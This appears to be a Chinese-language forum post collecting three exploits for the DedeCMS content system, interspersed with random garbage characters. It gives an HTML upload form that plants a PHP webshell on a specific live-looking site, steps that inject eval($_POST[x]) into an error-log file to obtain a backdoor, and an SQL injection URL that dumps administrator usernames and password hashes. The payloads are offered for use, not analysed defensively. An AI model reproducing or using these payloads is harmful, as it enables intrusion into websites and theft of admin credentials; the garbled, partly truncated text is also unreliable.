& _+ N; F) [' w+ i7 O! a5 j织梦(Dedecms)select_soft_post.php页面变量未初始漏洞% V) F& _$ a9 W- w. m# H% Q! Z
<html>5 K% L2 e4 Q3 s
<head>
) V8 v% `* V" Z! c) H) D/ e<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 ?/ }9 {! H. R# i0 t! _</head>/ B0 A* u/ c) ~4 {& R* y
<body style="FONT-SIZE: 9pt">3 o& Y; {- l4 N$ r- b
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
9 V0 a4 K: D5 U, c4 S$ G6 `0 j<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
% F: y) {- y- {. d0 ]9 q. h<input type='hidden' name='activepath' value='/data/cache/' />2 K0 z& O( D& y2 `) ^+ a! D$ H
<input type='hidden' name='cfg_basedir' value='../../' />
8 x9 W9 `' X( q+ n# f/ ~3 A/ i<input type='hidden' name='cfg_imgtype' value='php' />
; ?1 Y+ z' V% T$ T<input type='hidden' name='cfg_not_allowall' value='txt' />% Y R* H# C$ @3 l6 `
<input type='hidden' name='cfg_softtype' value='php' />6 D7 V2 g2 ?' R( W- n; ?
<input type='hidden' name='cfg_mediatype' value='php' />4 [1 }/ G- q) ? o9 h4 ^
<input type='hidden' name='f' value='form1.enclosure' />
! H! r; _2 W3 d$ j5 {7 g" F2 |+ x<input type='hidden' name='job' value='upload' />1 z. H) q3 B, m% D7 K: F6 U3 j; [
<input type='hidden' name='newname' value='fly.php' />( b) A% R8 Z6 l- k! r( @
Select U Shell <input type='file' name='uploadfile' size='25' />* n+ `8 ^; ~) r* Z' y5 j
<input type='submit' name='sb1' value='确定' />
8 [( v+ U9 Q9 ^2 \% a! }, M' H</form>9 u: \' z# A8 D T; S! X' F
<br />It's just a exp for the bug of Dedecms V55...<br />
# E& @* v: b8 M5 CNeed register_globals = on...<br />
( O. Q* L8 f5 @- g) iFun the game,get a webshell at /data/cache/fly.php...<br />
2 L+ P* U c6 Z( A</body>' ]. s0 g* @1 @+ R
</html>! x5 k, a5 z+ j) S, s- f6 v
! n* ^ Y- Q) t" ?) Q& L' C! w0 u3 ], V- v& `2 T8 a
7 \2 t$ ]( y2 u4 q3 ?' z4 s# e5 r3 Q8 _% h7 s% g6 b
) h( E \7 b% Q) c! S1 q0 l4 |" H/ Y/ i f A" |
* L7 T0 k* E( A3 w* m' j# J# a m) T W q
% N! g/ q# E! O8 \" f
0 {2 [# ^# ?2 g4 E+ J6 C织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞( h, N- Q3 x! R3 P/ ?% W
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
+ Z( E7 c R( g0 E- p' m. [1. 访问网址:5 t1 i" P- U1 g% d$ ]
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
( G9 u9 A7 G5 a* q, v& D8 e5 V可看见错误信息
4 w2 h( t% e' g% `4 ~, d
8 e& K- \: ]$ I2 [! m# o% O# {9 M2 c2 C
/ h1 x* d" M0 j$ u2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。- l+ q! T. j8 E( I! b" [+ b$ j T
int(3) Error: Illegal double '1024e1024' value found during parsing6 i. L) D% f( R1 O# }! f
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?># s0 e* s2 E S+ i1 ` [) u6 ^0 L
, a& }! A1 S6 i/ I+ X
# l; K: S/ r( g1 O h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是; `2 s+ M" Q* v1 S$ F( o
" m4 ^7 ]: v+ @ ]2 S/ y$ L
9 R/ F) k5 T3 P" T; _$ A$ K<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>. z8 D' H p: S8 {. [: `
3 S: b2 X7 M. @1 A& w2 r4 } q9 H3 p4 Z% L; z6 g+ u' O
按确定后的看到第2步骤的信息表示文件木马上传成功.4 F7 P. F3 V5 u
: Y0 ]. [- P1 l' z9 q( `
, z, i% s/ D. ~( l8 {0 X+ Q$ `& e8 M/ ?7 l! ^3 J/ p8 B
: V0 n3 A# |9 a* E7 D
& p3 @, K) ^/ Y5 q! M8 m
5 m1 l" T6 n( H( f- a- I. j2 {" l2 J, c' S
; ] R/ B* Z2 G6 B* ?
* \$ t; N( r. v# ^/ M! s6 R
3 z: G9 _7 Z. E4 C9 f
) B. H+ J3 C' s, v+ {' ?# z! A# d8 z% B: x8 T6 z& w7 W) b3 j/ Z
织梦(DedeCms)plus/infosearch.php 文件注入漏洞) I$ l& g' Y! b+ Q. M# \* a
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对